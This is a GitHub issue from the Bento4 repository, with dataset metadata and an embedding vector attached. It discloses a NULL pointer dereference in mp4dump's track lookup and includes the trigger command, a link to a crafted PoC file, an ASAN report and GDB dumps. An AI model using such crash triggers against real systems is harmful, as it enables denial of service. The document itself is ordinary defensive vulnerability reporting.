0x0000000000000020 0x00007fffffffd710│+0x20: 0x00000001fffffaf8 → 0x0000000000000000 0x00007fffffffd718│+0x28: 0x00007fffffffd7a0 → 0x0000555555da98f0 → 0x00005555558aa0fe → <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp 0x00007fffffffd720│+0x30: 0x00007fffffffd810 → 0x00007fffffffd880 → 0x00007fffffffdc70 → 0x0000555555985150 → <__libc_csu_init+0> push r15 ← $rbp 0x00007fffffffd728│+0x38: 0x00005555558a8b7a → <AP4_Movie::GetTrack(unsigned+0> test eax, eax ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]──── 0x5555558a9adb <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rdi, rax 0x5555558a9ade <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> call 0x55555585c180 <__asan_report_load8@plt> 0x5555558a9ae3 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rbp-0x18] → 0x5555558a9ae7 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rax+0x10] 0x5555558a9aeb <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov QWORD PTR [rbp-0x8], rax 0x5555558a9aef <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> cmp QWORD PTR [rbp-0x8], 0x0 0x5555558a9af4 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> je 0x5555558a9c13 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder const&, AP4_Track*&) const+361> 0x5555558a9afa <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rbp-0x20] 0x5555558a9afe <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rdx, rax ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:/home/aceteam//Bento4/Source/C++/Core/Ap4List.h+428 ]──── 423 template <typename T> 424 inline 425 AP4_Result 426 AP4_List<T>::Find(const typename Item::Finder& finder, T*& data) const 427 { // item=0x00007fffffffd718 → [...] → <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp → 428 Item* item = m_Head; 429 430 while (item) { 431 if (finder.Test(item->m_Data) == AP4_SUCCESS) { 432 data = item->m_Data; 433 return AP4_SUCCESS; ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]──── [#0] Id 1, Name: "mp4dump", stopped, reason: SIGSEGV ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]──── [#0] 0x5555558a9ae7 → Name: AP4_List<AP4_Track>::Find(this=0x20, finder=@0x7fffffffd7a0, data=@0x7fffffffd760) [#1] 0x5555558a8b7a → Name: AP4_Movie::GetTrack(this=0x0, track_id=0x1) [#2] 0x55555585cf30 → Name: DumpTrackData(mp4_filename=0x7fffffffe17b "$POC", mp4_file=@0x7fffffffdb80, tracks_to_dump=@0x7fffffffda80, key_map=@0x7fffffffdac0) [#3] 0x55555585e050 → Name: main(argc=0x6, argv=0x7fffffffdd90) ───────────────────────────────────────────────────────────────────────────────────────────────── ```
NULL POINTER DEREFERENCE in AP4_List<AP4_Track>: Find ()
https://api.github.com/repos/axiomatic-systems/Bento4/issues/364/comments
0
2019-02-01T10:30:07
2019-02-01T10:30:07Z
https://github.com/axiomatic-systems/Bento4/issues/364
405,641,344
364
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : NULL POINTER DEREFERENCE in AP4_List<AP4_Track>: Find () Issue date: --- start body --- **Description** - we observed a NULL pointer dereference occured in function AP4_List<AP4_Track>: Find () located in Ap4List.h.The same be triggered by sending a crafted file to the mp4dump binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact. **Command** - `./mp4dump --track 1:E791400BC075044176E34136E3C134F35E3513BE430B907B --format text $POC` **POC** - [REPRODUCER](https://github.com/SegfaultMasters/covering360/blob/master/BENTO4/POC_NP?raw=true) **Degub** - **ASAN REPORT** - ``` ASAN: DEADLYSIGNAL ================================================================= ==10246==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x55d0b61aeae7 bp 0x7ffcc696e490 sp 0x7ffcc696e460 T0) ==10246==The signal is caused by a READ memory access. ==10246==Hint: address points to the zero page. #0 0x55d0b61aeae6 in AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder const&, AP4_Track*&) const /home/aceteam/Desktop/packages/Bento4/Source/C++/Core/Ap4List.h:428 #1 0x55d0b61adb79 in AP4_Movie::GetTrack(unsigned int) /home/aceteam/Desktop/packages/Bento4/Source/C++/Core/Ap4Movie.cpp:148 #2 0x55d0b6161f2f in DumpTrackData(char const*, AP4_File&, AP4_Array<unsigned int> const&, AP4_ProtectionKeyMap const&) /home/aceteam/Desktop/packages/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:183 #3 0x55d0b616304f in main /home/aceteam/Desktop/packages/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:367 #4 0x7faa6d1a4b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55d0b61612f9 in _start (/home/aceteam/Desktop/packages/Bento4/builds/mp4dump+0x3082f9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/aceteam/Desktop/packages/Bento4/Source/C++/Core/Ap4List.h:428 in AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder const&, AP4_Track*&) const ==10246==ABORTING ``` **GDB** - ``` Program received signal SIGSEGV, Segmentation fault. [ Legend: Modified register | Code | Heap | Stack | String ] ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]──── $rax : 0x20 $rbx : 0x7fffffffd7e0 → 0x0000555555da9370 → 0x0000555555869846 → <AP4_AtomFactory::~AP4_AtomFactory()+0> push rbp $rcx : 0x0 $rdx : 0x0 $rsp : 0x7fffffffd6f0 → 0x00007fffffffd730 → 0x00000001ffffd750 → 0x0000000000000000 $rbp : 0x7fffffffd720 → 0x00007fffffffd810 → 0x00007fffffffd880 → 0x00007fffffffdc70 → 0x0000555555985150 → <__libc_csu_init+0> push r15 $rsi : 0x7fffffffd7a0 → 0x0000555555da98f0 → 0x00005555558aa0fe → <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp $rdi : 0x20 $rip : 0x5555558a9ae7 → <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rax+0x10] $r8 : 0x6 $r9 : 0x1e $r10 : 0x7ffff7fbd000 → 0x00007ffff7fee000 → 0x00007ffff716a698 → 0x00007ffff6f09090 → repz ret $r11 : 0x7ffff64a9b97 → <__libc_start_main+231> mov edi, eax $r12 : 0x7fffffffd740 → 0x0000000041b58ab3 $r13 : 0xffffffffae8 → 0x0000000000000000 $r14 : 0x20 $r15 : 0x7fffffffd740 → 0x0000000041b58ab3 $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $ss: 0x002b $cs: 0x0033 $gs: 0x0000 ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]──── 0x00007fffffffd6f0│+0x00: 0x00007fffffffd730 → 0x00000001ffffd750 → 0x0000000000000000 ← $rsp 0x00007fffffffd6f8│+0x08: 0x00007fffffffd760 → 0x0000000000000000 0x00007fffffffd700│+0x10: 0x00007fffffffd7a0 → 0x0000555555da98f0 → 0x00005555558aa0fe → <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp 0x00007fffffffd708│+0x18: 0x0000000000000020 0x00007fffffffd710│+0x20: 0x00000001fffffaf8 → 0x0000000000000000 0x00007fffffffd718│+0x28: 0x00007fffffffd7a0 → 0x0000555555da98f0 → 0x00005555558aa0fe → <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp 0x00007fffffffd720│+0x30: 0x00007fffffffd810 → 0x00007fffffffd880 → 0x00007fffffffdc70 → 0x0000555555985150 → <__libc_csu_init+0> push r15 ← $rbp 0x00007fffffffd728│+0x38: 0x00005555558a8b7a → <AP4_Movie::GetTrack(unsigned+0> test eax, eax ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]──── 0x5555558a9adb <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rdi, rax 0x5555558a9ade <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> call 0x55555585c180 <__asan_report_load8@plt> 0x5555558a9ae3 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rbp-0x18] → 0x5555558a9ae7 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rax+0x10] 0x5555558a9aeb <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov QWORD PTR [rbp-0x8], rax 0x5555558a9aef <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> cmp QWORD PTR [rbp-0x8], 0x0 0x5555558a9af4 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> je 0x5555558a9c13 <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder const&, AP4_Track*&) const+361> 0x5555558a9afa <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rax, QWORD PTR [rbp-0x20] 0x5555558a9afe <AP4_List<AP4_Track>::Find(AP4_List<AP4_Track>::Item::Finder+0> mov rdx, rax ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ source:/home/aceteam//Bento4/Source/C++/Core/Ap4List.h+428 ]──── 423 template <typename T> 424 inline 425 AP4_Result 426 AP4_List<T>::Find(const typename Item::Finder& finder, T*& data) const 427 { // item=0x00007fffffffd718 → [...] → <AP4_TrackFinderById::~AP4_TrackFinderById()+0> push rbp → 428 Item* item = m_Head; 429 430 while (item) { 431 if (finder.Test(item->m_Data) == AP4_SUCCESS) { 432 data = item->m_Data; 433 return AP4_SUCCESS; ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]──── [#0] Id 1, Name: "mp4dump", stopped, reason: SIGSEGV ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]──── [#0] 0x5555558a9ae7 → Name: AP4_List<AP4_Track>::Find(this=0x20, finder=@0x7fffffffd7a0, data=@0x7fffffffd760) [#1] 0x5555558a8b7a → Name: AP4_Movie::GetTrack(this=0x0, track_id=0x1) [#2] 0x55555585cf30 → Name: DumpTrackData(mp4_filename=0x7fffffffe17b "$POC", mp4_file=@0x7fffffffdb80, tracks_to_dump=@0x7fffffffda80, key_map=@0x7fffffffdac0) [#3] 0x55555585e050 → Name: main(argc=0x6, argv=0x7fffffffdd90) ───────────────────────────────────────────────────────────────────────────────────────────────── ``` --- end body ---
7,451
[ -0.020245516672730446, 0.022175166755914688, -0.00731922872364521, 0.00412818742915988, 0.029988670721650124, 0.0018515553092584014, -0.03618885949254036, 0.03098512999713421, -0.01725613884627819, 0.038782816380262375, -0.0019227309385314584, 0.023835932835936546, 0.03406940773129463, 0.008778329007327557, -0.013017234392464161, 0.00005254764255369082, -0.015587465837597847, 0.01060517132282257, -0.032709162682294846, 0.004187500569969416, 0.045995283871889114, -0.02125779166817665, -0.023630313575267792, 0.04058593511581421, -0.012708806432783604, 0.028248822316527367, -0.00331757590174675, 0.011158759705722332, -0.0019108683336526155, 0.008548985235393047, -0.017477573826909065, -0.001420547254383564, -0.01467009074985981, 0.010391644202172756, 0.042705386877059937, 0.029593251645565033, 0.04669122397899628, 0.04852597042918205, -0.01408486906439066, 0.025069642812013626, 0.0098222391679883, -0.06415297836065292, -0.016243863850831985, 0.0078965425491333, -0.01086614839732647, 0.018157698214054108, 0.018774552270770073, -0.013689449056982994, -0.026382438838481903, -0.003477721009403467, 0.016077786684036255, -0.00805866438895464, -0.03172852098941803, -0.05548536777496338, 0.029624884948134422, -0.03457554429769516, -0.009284467436373234, 0.02413645200431347, -0.022238435223698616, 0.012155218049883842, -0.010201842524111271, 0.0003894889377988875, 0.026619691401720047, 0.020419500768184662, 0.0416298434138298, 0.0037742862477898598, 0.00983014702796936, 0.012732531875371933, -0.02086237259209156, 0.018284231424331665, -0.020593486726284027, -0.02899221144616604, 0.0004918039194308221, 0.018679652363061905, 0.01026510912925005, -0.03745420649647713, 0.029055479913949966, 0.0329938642680645, -0.0039008206222206354, 0.025607414543628693, -0.023883381858468056, -0.0014027532888576388, -0.04330642521381378, 0.008121931925415993, 0.009592895396053791, 0.009126299060881138, -0.04944334551692009, -0.0709858387708664, -0.019944997504353523, -0.03818177804350853, 0.012748348526656628, -0.0013513487065210938, 0.019976630806922913, 0.01689235307276249, 0.018315864726901054, 0.010921507142484188, -0.007022663485258818, -0.015286946669220924, -0.059629373252391815, -0.002111544134095311, -0.04741879552602768, -0.025892117992043495, 0.0031692932825535536, 0.017762277275323868, 0.024721672758460045, -0.0032543085981160402, -0.0026038424111902714, 0.005678234621882439, 0.04049103334546089, 0.14880454540252686, 0.016338763758540154, -0.021067989990115166, -0.03400614112615585, -0.023614495992660522, 0.029197830706834793, 0.012519004754722118, 0.0017171123763546348, -0.026350805535912514, -0.02405736781656742, -0.03618885949254036, -0.019011804834008217, -0.034702081233263016, 0.00007383237243629992, 0.046469785273075104, -0.032345376908779144, 0.06184372678399086, -0.012091951444745064, 0.010273017920553684, -0.024816574528813362, 0.0036971792578697205, -0.014195586554706097, -0.03932058811187744, 0.006931717041879892, -0.0082089239731431, -0.017066337168216705, 0.030842779204249382, -0.015128778293728828, 0.015753543004393578, 0.008675520308315754, -0.003175224643200636, -0.05580170452594757, -0.031016763299703598, 0.019850095734000206, 0.008991856127977371, -0.037897076457738876, -0.0006524433847516775, 0.01967611163854599, 0.014598915353417397, -0.015555832535028458, -0.0012772073969244957, 0.008746695704758167, -0.029830502346158028, 0.006619334686547518, -0.00021525689226109535, 0.03947875648736954, -0.017177054658532143, 0.01970774494111538, 0.017604108899831772, -0.023519596084952354, -0.016386214643716812, 0.009197474457323551, -0.026398254558444023, 0.025433430448174477, -0.023630313575267792, -0.008730879053473473, -0.01972356252372265, 0.03217139095067978, -0.006678647827357054, -0.018252598121762276, 0.026825308799743652, 0.01924905739724636, -0.004590828903019428, 0.01406114362180233, 0.010850331746041775, -0.07762890309095383, -0.01342847105115652, -0.0006059815059415996, 0.040332864969968796, -0.019454676657915115, -0.015769358724355698, -0.008762512356042862, 0.012186852283775806, 0.002145154867321253, -0.018948538228869438, 0.0164178479462862, -0.0028371403459459543, 0.02328234352171421, -0.013847616501152515, 0.023139992728829384, -0.01005158293992281, -0.011720255948603153, 0.0025563917588442564, 0.019929179921746254, 0.009782697074115276, 0.04349622502923012, -0.0022005136124789715, -0.03365816920995712, -0.03096931427717209, -0.0011042110854759812, 0.016370398923754692, 0.01602242887020111, 0.0006247640121728182, -0.005243272520601749, 0.013270303606987, -0.022412419319152832, 0.02652478963136673, -0.01880618743598461, 0.04830453544855118, 0.024990558624267578, 0.0017704941565170884, -0.020625120028853416, -0.009513811208307743, 0.013199127279222012, 0.026793675497174263, -0.005575425457209349, 0.013736899010837078, 0.00965616200119257, 0.024816574528813362, 0.00681309076026082, -0.0008763500954955816, 0.027220729738473892, 0.0026552469935268164, 0.01692398637533188, -0.0036774082109332085, -0.04336969181895256, -0.02726818062365055, -0.006805182434618473, 0.03286733105778694, 0.0075683435425162315, -0.017825543880462646, 0.018173513934016228, 0.013436379842460155, -0.013349387794733047, -0.017841361463069916, 0.01923323981463909, -0.007121518719941378, -0.021890465170145035, -0.019454676657915115, 0.005437028128653765, -0.0046540964394807816, 0.0005288745742291212, 0.025876300409436226, -0.025591598823666573, 0.03429084271192551, -0.008722970262169838, 0.051246464252471924, -0.04903211072087288, -0.043591126799583435, -0.01266135647892952, 0.0148440757766366, -0.0030684610828757286, 0.0019177881767973304, 0.002528712386265397, 0.009150024503469467, -0.009395184926688671, -0.019201606512069702, 0.02565486542880535, 0.0090155815705657, -0.013895067386329174, -0.021495044231414795, 0.021922098472714424, -0.00033660148619674146, -0.014037418179214, 0.005476570222526789, 0.008548985235393047, -0.000516023428644985, -0.0026750180404633284, -0.0074853054247796535, -0.03495514765381813, -0.006010387558490038, 0.024800756946206093, -0.005361898336559534, -0.027552882209420204, -0.03688479959964752, -0.005875944625586271, -0.015864260494709015, 0.013760624453425407, 0.006931717041879892, 0.0009761936962604523, 0.01344428863376379, 0.004007583949714899, 0.02250732108950615, -0.039162419736385345, 0.015492564998567104, 0.017556658014655113, 0.005069287493824959, 0.001587612321600318, -0.026682958006858826, -0.021083807572722435, 0.022159351035952568, 0.009885505773127079, 0.0362204946577549, -0.06807555258274078, 0.017414307221770287, 0.005630784202367067, 0.016141055151820183, 0.006599563639611006, 0.028596792370080948, -0.02366194687783718, 0.009758971631526947, -0.017351040616631508, -0.006014341954141855, -0.0052274554036557674, 0.02929273247718811, -0.01811024732887745, 0.0077700079418718815, -0.02533852867782116, -0.0029518119990825653, -0.023045090958476067, -0.018632201477885246, 0.026334987953305244, -0.05744665116071701, -0.025148726999759674, -0.033500004559755325, -0.04900047555565834, -0.011641171760857105, -0.037169501185417175, -0.019169973209500313, -0.007975626736879349, 0.008596436120569706, -0.007599976845085621, -0.0030170565005391836, -0.032329559326171875, 0.022190984338521957, 0.028834044933319092, -0.036347027868032455, 0.0004668430192396045, 0.037517473101615906, -0.07174504548311234, 0.012748348526656628, 0.012297569774091244, 0.007026617880910635, 0.01573772542178631, -0.038339946419000626, -0.019802644848823547, -0.036789897829294205, -0.03568272292613983, -0.00684077013283968, 0.03615722805261612, 0.005302585661411285, -0.012392470613121986, 0.02408900111913681, 0.03161780163645744, -0.01026510912925005, -0.015959160402417183, -0.021083807572722435, 0.026287537068128586, -0.007797687314450741, 0.02405736781656742, 0.008730879053473473, 0.0014462495455518365, 0.0329938642680645, -0.025132911279797554, -0.008596436120569706, 0.006619334686547518, -0.008849505335092545, -0.012495279312133789, -0.007615793962031603, 0.010953140445053577, -0.0047569056041538715, 0.0001943737588590011, -0.02252313680946827, -0.021906280890107155, 0.025449246168136597, 0.021811380982398987, 0.022618038579821587, -0.014124411158263683, 0.012732531875371933, -0.04817800223827362, 0.010486545041203499, -0.015081328339874744, 0.04615345224738121, -0.03577762469649315, 0.020609302446246147, -0.017445940524339676, -0.018189331516623497, 0.020166432484984398, 0.03403777629137039, -0.0410604365170002, -0.0016825131606310606, -0.023472145199775696, -0.006726098246872425, 0.025559963658452034, -0.04586874693632126, -0.016560200601816177, 0.0288814939558506, -0.019818462431430817, 0.03340510278940201, -0.03302549943327904, -0.01646529883146286, 0.0014936999650672078, 0.07908404618501663, -0.04125024005770683, -0.04931681230664253, 0.012590180151164532, 0.022412419319152832, -0.0064690751023590565, -0.0018970286473631859, 0.004076782613992691, -0.051626067608594894, 0.041123706847429276, 0.010771247558295727, 0.025512514635920525, -0.020229699090123177, -0.008904864080250263, 0.022776205092668533, 0.03748583793640137, -0.010597262531518936, 0.04738716036081314, 0.020783288404345512, 0.05178423598408699, -0.012004958465695381, -0.02095727249979973, -0.012756257317960262, 0.028818227350711823, 0.023139992728829384, 0.010787064209580421, 0.023440511897206306, -0.025401797145605087, 0.000105651342892088, -0.009355642832815647, 0.017398491501808167, 0.016046153381466866, 0.020166432484984398, 0.005508203990757465, 0.04020633175969124, -0.012139401398599148, 0.007647427264600992, 0.022396601736545563, -0.04849433898925781, 0.022981824353337288, 0.015571649186313152, -0.009434727020561695, 0.0033709576819092035, 0.006180418189615011, -0.026224270462989807, 0.01799952983856201, -0.030811145901679993, -0.016046153381466866, -0.016702551394701004, -0.02173229679465294, 0.06222333014011383, -0.012447829358279705, 0.02965651825070381, 0.012542730197310448, -0.056054774671792984, -0.009031398221850395, -0.02212771587073803, 0.012930242344737053, -0.0013632113113999367, -0.01807861402630806, 0.012859066016972065, 0.019011804834008217, -0.011364378035068512, -0.0011615469120442867, 0.009616619907319546, -0.010692163370549679, -0.0031080031767487526, 0.025971202179789543, 0.011941690929234028, -0.00011158265260746703, 0.04384419694542885, 0.005567517131567001, 0.00021649258269462734, 0.02576558291912079, 0.0066311974078416824, -0.01449610572308302, -0.002548483433201909, -0.010249292477965355, -0.03777054324746132, 0.01203659176826477, -0.02617681957781315, 0.05947120487689972, 0.01383179984986782, 0.014851984567940235, 0.032266292721033096, -0.02571813203394413, -0.01003576535731554, -0.025591598823666573, -0.032297924160957336, -0.0024535825941711664, 0.0024100863374769688, -0.02772686816751957, 0.0050851041451096535, 0.00017732127162162215, -0.009972498752176762, -0.01765155978500843, -0.013341479003429413, -0.003614140907302499, -0.0024081093724817038, 0.037169501185417175, 0.00198995228856802, -0.029846319928765297, -0.024753307923674583, -0.007912359200417995, -0.0011704439530149102, -0.022190984338521957, -0.007437854539602995, 0.02924528159201145, 0.04542587697505951, 0.032345376908779144, -0.04292682185769081, 0.008288008160889149, 0.004397073294967413, 0.02366194687783718, -0.027505431324243546, -0.04368602856993675, 0.014654274098575115, -0.004626417066901922, -0.045995283871889114, -0.01769901067018509, -0.035144951194524765, 0.015563740395009518, -0.017778094857931137, -0.009727338328957558, -0.031127480790019035, 0.014543556608259678, 0.004147958476096392, 0.014701724983751774, 0.012305477634072304, 0.005694051273167133, -0.023076726123690605, 0.006627243477851152, 0.01408486906439066, 0.011435553431510925, 0.042768653482198715, 0.01923323981463909, -0.006259502377361059, -0.002307277172803879, -0.0410604365170002, 0.017445940524339676, 0.001528299180790782, 0.016670918092131615, 0.03381633758544922, -0.011356469243764877, -0.012368745170533657, -0.018173513934016228, 0.016322948038578033, -0.009600803256034851, -0.029972855001688004, -0.0037644007243216038, 0.05314448103308678, -0.023551229387521744, 0.002157017355784774, -0.03973182663321495, 0.043527860194444656, 0.008968130685389042, 0.0353347547352314, -0.01081869751214981, -0.0010488522239029408, 0.044318702071905136, 0.017192872241139412, 0.0022005136124789715, -0.015405572950839996, 0.001290058484300971, 0.01962866075336933, -0.010012040846049786, 0.025385979562997818, 0.02249150350689888, 0.008651794865727425, -0.005314447917044163, -0.0004873554571531713, 0.014100685715675354, -0.0006959396414458752, 0.002285528928041458, 0.02045113407075405, 0.010091125033795834, 0.005591242108494043, -0.018790369853377342, 0.0031277742236852646, 0.015397664159536362, -0.005053470842540264, 0.025101276114583015, -0.027489615604281425, 0.004883440211415291, 0.030415724962949753, -0.015389756299555302, -0.0031000946182757616, -0.02612937055528164, -0.025164544582366943, 0.006512571591883898, -0.014124411158263683, -0.004772722255438566, 0.0013879250036552548, 0.00846199318766594, -0.006188326980918646, 0.011095492169260979, -0.006971258670091629, 0.006741915363818407, -0.024357886984944344, 0.0024021780118346214, -0.005923395045101643, 0.009126299060881138, -0.029640700668096542, -0.017572475597262383, -0.019470492377877235, 0.012455737218260765, -0.01026510912925005, -0.0048794858157634735, -0.016141055151820183, -0.014124411158263683, 0.012779981829226017, -0.015532107092440128, -0.04064920172095299, -0.024199718609452248, 0.015745634213089943, 0.024405337870121002, 0.003378866007551551, -0.055706802755594254, 0.03742257133126259, 0.023456329479813576, 0.003653683001175523, 0.05048725754022598, 0.01527903787791729, 0.021985365077853203, 0.009308192878961563, 0.030020304024219513, 0.007785824593156576, 0.004290309734642506, 0.019043438136577606, 0.0026334987487643957, -0.0680122822523117, 0.03017847239971161, -0.008707153610885143, 0.01565864123404026, 0.006583746988326311, 0.009403093717992306, -0.011285293847322464, -0.014306304045021534, -0.01761992648243904, -0.03346836939454079, 0.038719549775123596, 0.005203730426728725, -0.021400144323706627, -0.028264638036489487, 0.026445705443620682, 0.027552882209420204, 0.007070113904774189, -0.01611732877790928, -0.019549576565623283, 0.034354109317064285, 0.006148784887045622, -0.02529107965528965, 0.021953731775283813, -0.02533852867782116, 0.028359539806842804, 0.020419500768184662, -0.014219311997294426, 0.030273374170064926, 0.0032543085981160402, -0.04469830542802811, 0.009798513725399971, 0.019090889021754265, 0.006785411387681961, 0.011198300868272781, -0.042800288647413254, 0.04618508368730545, 0.04216761514544487, -0.0001587859442224726, -0.014322121627628803, 0.007070113904774189, -0.038023609668016434, -0.0008951326017268002, 0.013902976177632809, -0.015255313366651535, -0.02130524255335331, -0.025132911279797554, -0.014116502366960049, 0.015816809609532356, 0.03770727291703224, 0.005527975037693977, -0.03467044606804848, 0.005733593367040157, 0.01763574220240116, -0.002700720215216279, -0.025180360302329063, -0.007299457676708698, 0.0177464596927166, -0.02695184387266636, -0.00865970365703106, -0.008699245750904083, -0.025559963658452034, 0.01148300338536501, 0.011356469243764877, -0.011799340136349201, 0.010122758336365223, 0.0016370398225262761, 0.002015654696151614, -0.022190984338521957, -0.03448064625263214, -0.0008778329356573522, -0.008857413195073605, 0.02924528159201145, 0.024342069402337074, 0.01926487497985363, -0.056877247989177704, 0.011902149766683578, -0.006994984112679958, -0.022792022675275803, -0.012732531875371933, 0.0022420326713472605, 0.00037564922240562737, 0.0048004016280174255, -0.018964353948831558, 0.026303354650735855, 0.006152738817036152, -0.013776441104710102, -0.019075073301792145, 0.04302172362804413, -0.03457554429769516, -0.0061646015383303165, -0.0011170621728524566, -0.006579793058335781, 0.01182306557893753, 0.0016864673234522343, 0.00040061012259684503, 0.012692989781498909, -0.0011368332197889686, -0.0008812928572297096, 0.0016716390382498503, -0.024769123643636703, -0.011862607672810555, -0.01127738505601883, -0.03384797275066376, 0.020166432484984398, -0.004863669164478779, -0.007718603126704693, -0.0030308961868286133, 0.013665723614394665, 0.006734006572514772, 0.021937914192676544, -0.014994335360825062, 0.019850095734000206, 0.011079675517976284, -0.0328356958925724, -0.01547674834728241, 0.0346071794629097, -0.046754490584135056, -0.00036823510890826583, 0.022159351035952568, 0.03384797275066376, -0.01284324936568737, 0.008857413195073605, -0.001538184704259038, 0.0009153978899121284, -0.0007453671423718333, -0.018568934872746468, 0.0009371459600515664, 0.0002240302856080234, 0.019865913316607475, 0.004907165188342333, 0.01643366552889347, 0.037169501185417175, -0.0529230460524559, -0.010067399591207504, 0.005057424772530794, 0.04181964322924614, 0.011522545479238033, 0.009545444510877132, -0.003347232239320874, -0.01003576535731554, 0.004551286809146404, -0.010209750384092331, 0.019913364201784134, 0.0037485838402062654, -0.018189331516623497, 0.0024199718609452248, -0.02087818831205368, 0.028248822316527367, -0.0014838144415989518, 0.02367776446044445, -0.017857179045677185, -0.002131315181031823, -0.008928589522838593, 0.018157698214054108, -0.029529983177781105, -0.0008961211424320936, 0.005191867705434561, 0.02646152302622795, 0.017161238938570023, -0.0457422137260437, 0.010249292477965355, -0.03900425136089325, -0.009094665758311749, 0.009284467436373234, -0.017825543880462646, 0.01203659176826477, 0.014124411158263683, 0.013286120258271694, 0.009932956658303738, -0.004828081000596285, -0.003540988313034177, 0.022760389372706413, 0.003590415697544813, -0.0009460429428145289, -0.014361662790179253, 0.0013029096880927682, -0.000963342550676316, -0.02685694210231304, -0.019565394148230553, 0.02208026684820652, -0.0027659644838422537, -0.03096931427717209, -0.014140227809548378, 0.0030486900359392166, -0.004266584292054176, 0.0015638871118426323, 0.003248377237468958, -0.04134514182806015, 0.014306304045021534, -0.015342305414378643, -0.008754604496061802, 0.012851158156991005, 0.016702551394701004, 0.022744571790099144, -0.0015441160649061203, 0.016765817999839783, -0.020308783277869225, 0.003531102789565921, -0.008062618784606457, -0.013555006124079227, -0.015745634213089943, -0.012605997733771801, -0.06250803172588348, 0.02010316587984562, -0.009490085765719414, -0.001390890683978796, 0.007892588153481483, 0.028327906504273415, -0.0062278686091303825, -0.004321943037211895, 0.024816574528813362, -0.00004686347892857157, 0.014978518709540367, -0.024326253682374954, 0.016639282926917076, 0.01284324936568737, -0.005259089171886444, -0.009157932363450527, 0.033563271164894104, -0.015358122065663338, -0.02045113407075405, -0.04539424553513527, -0.01727195642888546, -0.008896955288946629, -0.019486309960484505, -0.015484657138586044, -0.015010152012109756, -0.007109655998647213, 0.01728777214884758, 0.010502361692488194, 0.01567445881664753, -0.02005571499466896, 0.017161238938570023, 0.004294263664633036, -0.008999764919281006, 0.0008076458470895886, -0.01684490218758583, 0.020577669143676758, -0.012352928519248962, 0.04469830542802811, -0.0023310023825615644, -0.038719549775123596, 0.00027679416234605014, -0.0027224684599786997, 0.029640700668096542, -0.007493213750422001, -0.0507403239607811, -0.01888527162373066, -0.00602620467543602, 0.014527739956974983, -0.006623289082199335, 0.0024318345822393894, 0.022301701828837395, -0.021178707480430603, -0.016307130455970764, -0.008707153610885143, -0.00965616200119257, 0.024595139548182487, 0.005255135241895914, -0.00802703108638525, 0.017082154750823975, -0.013199127279222012, -0.006338586565107107, -0.0009401116403751075, -0.0304948091506958, 0.0077146487310528755, -0.022760389372706413, -0.025591598823666573, -0.02565486542880535, 0.010415369644761086, 0.024769123643636703, -0.06763267517089844, -0.020640935748815536, 0.03735930472612381, 0.012186852283775806, -0.00032819880289025605, -0.026809493079781532, -0.026382438838481903, -0.0019069141708314419, 0.0006074643461033702, 0.002054208191111684, 0.005128600634634495, -0.001096302643418312, -0.018648019060492516, 0.01087405625730753, 0.02777431719005108, 0.01284324936568737, -0.003477721009403467, 